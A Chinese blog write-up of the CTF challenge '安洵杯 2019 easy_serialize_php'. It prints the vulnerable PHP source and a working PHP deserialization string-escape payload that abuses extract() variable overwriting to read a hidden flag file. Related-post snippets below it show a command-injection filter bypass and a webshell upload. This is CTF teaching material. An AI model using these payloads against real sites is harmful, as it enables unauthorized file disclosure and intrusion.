[ctf web][安洵杯 2019]easy_serialize_php writeup

最新推荐文章于 2024-03-28 09:44:49 发布
最新推荐文章于 2024-03-28 09:44:49 发布
阅读量351 收藏 3
点赞数 1
分类专栏: ctf # web 文章标签: php ctf web serialize
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/120058826
版权
ctf 同时被 2 个专栏收录
85 篇文章 10 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏
本文详细解析了一个PHP安全问题,涉及`extract()`函数导致的变量覆盖及通过字符串覆盖逃逸来读取敏感文件。攻击者通过构造特定的payload,绕过过滤函数,设置`_SESSION['img']`为目标文件的base64编码,最终通过`show_image`函数读取。此案例展示了PHP应用中常见的安全风险及防范措施。
摘要由CSDN通过智能技术生成

[安洵杯 2019]easy_serialize_php

知识点:
extract()变量覆盖
字符串覆盖逃逸(原理:序列化后的结构经过了某些处理,反而而把结构体本身的结构给打乱了)

源码:

<?php

$function = @$_GET['f'];		//get f为function

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);		//unset将$_SESSION销毁了。
}

$_SESSION["user"] = 'guest';		//$_SESSION数组
$_SESSION['function'] = $function;

extract($_POST);		//extract会导致变量覆盖

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));			//$_SESSION数组序列号并过滤存为$serialize_info

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

phpinfo里面找到d0g3_f1ag.php
在这里插入图片描述

思路:

f=show_image读文件的,让$userinfo[‘img’]是相应的d0g3_f1ag.php的base64加密

不传img_path
if(!$_GET[‘img_path’]){
$_SESSION[‘img’] = base64_encode(‘guest_img.png’);

利用自定义函数filter的替换进行字符串覆盖逃逸,自己把img的base放进去

payload:

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

原理:

_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}				//ZDBnM19mMWFnLnBocA==   →   d0g3_f1ag.php
|serialize($_SESSION)
"a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"

phpflag 的值 ;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==
|
↓
filter过滤后phpflag就会被替换成空
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

第一个键名成了 ";s:48: 7位,然后对应的值是 s:1:"1"; 即为1
因为已经闭合了,后面的部分;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}会被直接抛弃

要凑两个:;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}长度为48 → s:48:

phpflag长度7 == ";s:48:

在这里插入图片描述

$flag = 'flag in /d0g3_fllllllag';同理读取
在这里插入图片描述

参考文章:https://www.cnblogs.com/h3zh1/p/12732336.html

shu天
关注
专栏目录
[安洵 2019]easy_serialize_php
Yb_140的博客
10-16 505
变量覆盖+反序列化字符串逃逸
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 487
buuctf[安洵 2019]easy_serialize_php
buuctf easy_serialize_php
qq_52671379的博客
03-30 1913
buuctf easy_serialize_php
buuctf web easy_serialize_php1
qq_41696858的博客
12-09 508
审计源码 <?php $function = @$_GET['f']; //正则匹配 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SES
第二届安洵2019部分writeup
Sea_Sand息禅
12-01 6130
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 3818
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
N1CTF WEB WriteUp
heySister
03-13 4434
77777 作为一个小白,瑟瑟发抖地选择了这道被解出次数最多的题目….emmm…还是有一些收获的。 首先题目给出了一些代码和一些信息: 信息是关于安装配置虚拟机的…和我之前配置环境的步骤,指令差不多…感觉应该没什么问题,就只是告诉我们服务器上有这个东西。 给出的代码就比较关键了。而且题目About 里说可以修改points ,告诉我们flag 是admin's password...
南邮CTF练习题——web
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
2020_WHUCTF_Writeup(部分)
lysecl‘s blog
05-28 4万+
0x1 crypto bvibvi 首先要通过验证问题,对一个等式计算求解,简单的枚举求解即可。 通过验证过后,需要回答一系列问题,是关于B站BV号和AV号的。 题目给出BV号,让我们找出对应的AV号。多组正确后再给AV号,让我们找出BV号。 简单的了解了下Bilibili的av号和bv号知识后,发现 av号对应url格式为 url =‘https://www.bilibili.com/video/av’+aid bv号为 url =‘https://www.bilibili.com/video/’+b
BUUCTF - Web - easy_serialize_php
1tachi的博客
12-07 444
文章目录源码分析知识点payload其他解法 源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
【网络安全 | CTFCTF极客大挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5189
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BugkuCTF extract变量覆盖
mafucan的博客
07-07 899
http://123.206.87.240:9009/1.php先确定什么叫extract()函数 直接做题的话就是当shiyan等于content的值,出现flag 所以直接在给出的网页后面加上 ?shiyan=&content 就得到了答案flag{bugku-dmsj-p2sm3N} ...
探索CTF竞赛仓库2019:技术解析与实战应用
最新发布
gitblog_00011的博客
03-28 407
探索CTF竞赛仓库2019:技术解析与实战应用 项目地址:https://gitcode.com/securebluefox/CTF_competition_warehouse_2019 在信息安全领域,Capture The Flag (CTF) 竞赛是提升技能和了解最新安全趋势的一种流行方式。CTF_competition_warehouse_2019 是一个开放源代码的项目,它集成了丰富的...
BUUCTF:[GUET-CTF2019]zips
末初的CSDN博客
04-07 3853
下载下来是attachment.zip里面的222.zip就是第一层解压,爆破密码,我使用ziprekko 222.zip的解压密码是723456 111.zip是伪加密,使用winhex打开,修改如下图 把这里的9修改为偶数,解压得到这两个文件 flag.zip是掩码爆破,先看看setup.sh 执行这段python代码 使用ARCHPR掩码爆破,设置掩码15????????.?...
Pragyan CTF 2019
zhang14916的博客
03-13 785
Cryptography 1.Spoiler 将pdf文件下载后发现pdf文件中有遗传字符串“3a2c3a35152538272c2d213e332e3c25383030373a15”,使用winhex打开pdf文件观察pdf文件二进制发现 将00去掉剩下字符串“6a6f6e736e6f776973647261676f6e62796269727468”,我们发现两个字符串长度相同,尝试异...
NO.2-15 [De1CTF 2019]SSRF Me
nigo134的博客
07-27 155
题目给了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key =
CTF干货合集
阳光心态,健康人生的博客
01-05 3221
如何开始你的CTF比赛之旅 http://www.freebuf.com/articles/others-articles/36927.html http://blog.idf.cn/2015/02/ctf-field-guide/ CTF领域指南 https://ctftime.org/event/list/upcoming CTF预告 CTF练习平台 http://hackingla
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3348
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
php upload ctf,强网CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值